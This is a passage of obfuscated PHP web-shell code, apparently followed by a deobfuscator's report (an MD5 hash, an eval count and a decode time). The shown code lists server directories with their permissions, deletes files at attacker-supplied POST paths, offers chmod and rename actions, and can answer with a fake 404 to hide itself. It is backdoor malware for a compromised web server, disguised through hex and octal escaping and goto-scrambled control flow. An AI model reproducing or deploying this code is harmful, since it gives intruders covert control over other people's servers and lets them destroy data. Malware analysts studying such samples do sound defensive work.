\x20\40\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\40\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x3c\x2f\146\x6f\156\x74\76\74\x62\162\x2f\76"; } } elseif ($_POST["\164\x79\x70\145"] == "\x66\151\154\145") { if (unlink($_POST["\160\141\164\150"])) { echo "\x3c\146\157\156\x74\x20\x63\x6f\x6c\157\162\75\42\x6c\x69\x6d\x65\42\76\x44\x65\x6c\x65\x74\x65\x20\x46\x69\154\145\40\123\165\x63\x63\x65\x73\x73\x3c\x2f\x66\157\156\x74\x3e\74\142\162\57\x3e"; } else { echo "\x3c\146\x6f\x6e\x74\x20\143\157\154\157\x72\75\42\167\x68\x69\x74\145\42\x3e\104\145\x6c\145\164\x65\x20\x46\151\154\x65\40\x46\141\151\154\145\x64\74\57\146\x6f\x6e\164\x3e\x3c\142\162\x2f\76"; } } } goto dsCtJ; pOkzs: foreach ($scandir as $dir) { goto CWQjs; UBskq: if (is_writable($path . "\57" . $dir)) { echo "\74\146\157\x6e\x74\40\143\157\x6c\157\162\75\42\x6c\151\155\145\x22\x3e"; } elseif (!is_readable($path . "\57" . $dir)) { echo "\x3c\x66\157\x6e\x74\40\x63\157\154\x6f\x72\x3d\42\x77\x68\151\x74\x65\42\x3e"; } goto egNgE; CWQjs: if (!is_dir($path . "\57" . $dir) || $dir == "\x2e" || $dir == "\56\56") { continue; } goto e5AHP; uncPW: echo "\74\57\x63\x65\156\x74\145\162\x3e\74\57\164\x64\x3e\xd\xa\74\164\144\x3e\74\143\145\x6e\164\145\162\x3e\x3c\x66\x6f\x72\155\x20\155\145\164\x68\157\144\75\x22\120\117\123\124\x22\40\x61\143\164\x69\x6f\x6e\x3d\x22\77\x6f\x70\164\151\157\156\x26\x70\141\x74\150\x3d" . $path . "\42\x3e\xd\xa\74\163\145\x6c\x65\143\164\40\156\141\155\x65\x3d\x22\x6f\160\x74\x22\76\xd\xa\74\x6f\x70\164\151\157\x6e\40\x76\x61\154\165\145\75\42\x22\76\103\150\157\x6f\163\x65\x3c\57\x6f\x70\x74\151\157\156\76\xd\12\x3c\157\x70\164\151\x6f\x6e\40\x76\x61\x6c\165\145\75\42\x64\x65\x6c\x65\x74\145\x22\x3e\x44\x65\154\x65\164\x65\74\57\x6f\x70\x74\x69\157\x6e\x3e\15\12\74\x6f\x70\x74\151\157\156\x20\x76\x61\x6c\165\145\x3d\42\143\x68\155\x6f\x64\42\76\103\150\155\x6f\x64\74\x2f\157\x70\x74\151\x6f\156\x3e\xd\xa\74\x6f\160\164\x69\x6f\156\x20\x76\141\154\165\145\75\x22\162\x65\x6e\141\x6d\x65\x22\x3e\x52\x65\156\141\155\x65\x3c\57\x6f\160\164\x69\157\156\76\15\xa\x3c\x2f\x73\145\x6c\x65\143\164\76\15\12\x3c\x69\156\160\165\x74\40\164\171\x70\145\x3d\x22\150\151\144\144\x65\156\42\40\156\x61\155\x65\x3d\x22\164\x79\160\x65\42\x20\166\141\x6c\165\x65\x3d\x22\x64\151\x72\42\76\xd\xa\74\151\x6e\160\165\164\40\164\171\x70\145\75\x22\x68\151\x64\x64\145\x6e\42\x20\156\x61\x6d\145\75\x22\156\x61\x6d\x65\42\x20\166\141\x6c\165\x65\75\x22" . $dir . "\x22\76\15\12\x3c\151\156\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x68\x69\x64\144\145\x6e\42\40\x6e\141\x6d\145\75\x22\160\141\164\x68\42\x20\166\141\154\x75\x65\x3d\x22" . $path . "\57" . $dir . "\42\76\xd\12\74\x69\x6e\x70\165\x74\x20\x74\x79\x70\145\x3d\x22\x73\165\142\155\x69\x74\42\40\166\141\154\165\145\x3d\x22\x2b\42\76\15\12\x3c\x2f\146\x6f\162\155\x3e\74\57\x63\145\x6e\164\145\162\x3e\x3c\x2f\x74\144\x3e\15\xa\74\x2f\164\x72\76"; goto n5gN_; egNgE: echo perms($path . "\57" . $dir); goto QPBrR; e5AHP: echo "\x3c\164\x72\76\15\12\74\164\x64\76\x5b\x44\x5d\x20\74\x61\40\150\x72\x65\146\75\42\77\x70\x61\x74\150\x3d" . $path . "\x2f" . $dir . "\x22\x3e" . $dir . "\x3c\57\141\76\74\57\x74\x64\x3e\15\12\74\x74\144\76\74\x63\x65\x6e\164\x65\x72\76\55\x2d\x3c\57\x63\145\x6e\x74\x65\162\76\x3c\x2f\164\x64\x3e\xd\xa\74\164\144\x3e\74\x63\x65\x6e\164\x65\x72\x3e"; goto UBskq; wtudV: echo "\74\57\x63\145\x6e\x74\x65\162\x3e\74\57\x74\144\76\x3c\164\144\x3e\74\x63\145\156\x74\145\162\76" . date("\144\x2d\x4d\55\x59\x20\110\x3a\151", filemtime("{$path}\57{$dir}")) . ''; goto uncPW; QPBrR: if (is_writable($path . "\x2f" . $dir) || !is_readable($path . "\57" . $dir)) { echo "\x3c\57\146\x6f\x6e\x74\76"; } goto wtudV; n5gN_: } goto EtQro; J1A1Q: echo "\74\57\164\x61\x62\154\145\76\xd\12\x3c\57\x64\x69\x76\x3e"; goto n4tkg; lLkmd: echo "\x3c\144\x69\166\40\x69\x64\x3d\x22\143\x6f\156\x74\x65\156\164\x22\x3e\74\164\141\142\x6c\145\40\x77\151\144\x74\x68\x3d\x22\x37\x30\60\42\x20\x62\x6f\162\144\145\x72\x3d\42\x30\42\x20\143\x65\154\x6c\160\141\144\x64\151\x6e\147\75\42\63\42\40\x63\x65\154\154\163\x70\141\x63\151\x6e\x67\75\42\61\x22\x20\x61\154\x69\x67\x6e\75\x22\x63\x65\156\x74\x65\162\42\x3e\15\12\x3c\x74\x72\x20\143\154\x61\x73\163\75\x22\x66\x69\x72\x73\x74\42\x3e\15\12\74\x74\144\x3e\x3c\x63\x65\x6e\164\145\162\76\x4e\x61\155\145\74\57\160\145\154\x6c\145\x72\x3e\74\x2f\x63\145\156\164\145\x72\x3e\74\57\x74\144\76\15\xa\74\x74\144\x3e\x3c\x63\x65\x6e\x74\x65\162\76\123\x69\172\145\x3c\57\x70\x65\154\x6c\x65\162\76\74\x2f\x63\145\156\x74\145\x72\x3e\74\x2f\x74\144\76\15\12\x3c\164\144\x3e\74\x63\x65\156\164\x65\162\76\120\145\162\155\x69\x73\163\151\157\x6e\74\x2f\x70\145\154\154\145\162\x3e\x3c\x2f\143\145\156\x74\145\x72\76\74\57\x74\x64\76\15\xa\x3c\x74\x64\x3e\74\x63\x65\156\164\145\x72\x3e\x4c\x61\163\x74\40\x55\x70\x64\141\x74\x65\x3c\57\x70\x65\x6c\x6c\x65\162\76\x3c\57\143\145\156\164\x65\x72\76\74\x2f\x74\x64\x3e\15\12\x3c\164\144\x3e\x3c\x63\145\156\164\x65\162\76\117\x70\x74\151\157\156\163\74\57\160\x65\154\154\x65\162\76\74\x2f\143\145\156\x74\x65\x72\x3e\74\x2f\164\x64\x3e\15\xa\74\x2f\x74\x72\76"; goto pOkzs; prt5r: echo "\74\57\x74\x61\142\x6c\x65\x3e\x3c\x62\x72\57\x3e\74\143\145\156\x74\145\162\x3e"; goto bPlkW; n4tkg: } goto QnQLb; DJ0VG: header("\x48\124\124\x50\57\61\56\60\40\x34\x30\64\x20\x4e\157\164\40\x46\x6f\165\156\144", true, 404); goto IclXn; AHrZZ: function perms($file) { goto JLdPO; JIogc: if (($perms & 0xc000) == 0xc000) { $info = "\x73"; } elseif (($perms & 0xa000) == 0xa000) { $info = "\154"; } elseif (($perms & 0x8000) == 0x8000) { $info = "\55"; } elseif (($perms & 0x6000) == 0x6000) { $info = "\x62"; } elseif (($perms & 0x4000) == 0x4000) { $info = "\x64"; } elseif (($perms & 0x2000) == 0x2000) { $info = "\143"; } elseif (($perms & 0x1000) == 0x1000) { $info = "\160"; } else { $info = "\165"; } goto jBx3e; CYPfD: $info .= $perms & 0x40 ? $perms & 0x800 ? "\x73" : "\x78" : ($perms & 0x800 ? "\123" : "\55"); goto czuwv; GUiGm: $info .= $perms & 0x8 ? $perms & 0x400 ? "\163" : "\170" : ($perms & 0x400 ? "\x53" : "\x2d"); goto vibq9; fFzrU: $info .= $perms & 0x1 ? $perms & 0x200 ? "\164" : "\x78" : ($perms & 0x200 ? "\x54" : "\55"); goto ROCAc; JLdPO: $perms = fileperms($file); goto JIogc; MwZwL: $info .= $perms & 0x80 ? "\x77" : "\x2d"; goto CYPfD; czuwv: $info .= $perms & 0x20 ? "\x72" : "\55"; goto RU7zf; ROCAc: return $info; goto WWFXd; RU7zf: $info .= $perms & 0x10 ? "\167" : "\x2d"; goto GUiGm; jBx3e: $info .= $perms & 0x100 ? "\162" : "\x2d"; goto MwZwL; vibq9: $info .= $perms & 0x4 ? "\162" : "\55"; goto Z7img; Z7img: $info .= $perms & 0x2 ? "\167" : "\x2d"; goto fFzrU; WWFXd: }

Function Calls

None

Variables

None

Stats

MD5 2bb1b79feead13d70425442a9b7b85e6
Eval Count 0
Decode Time 62 ms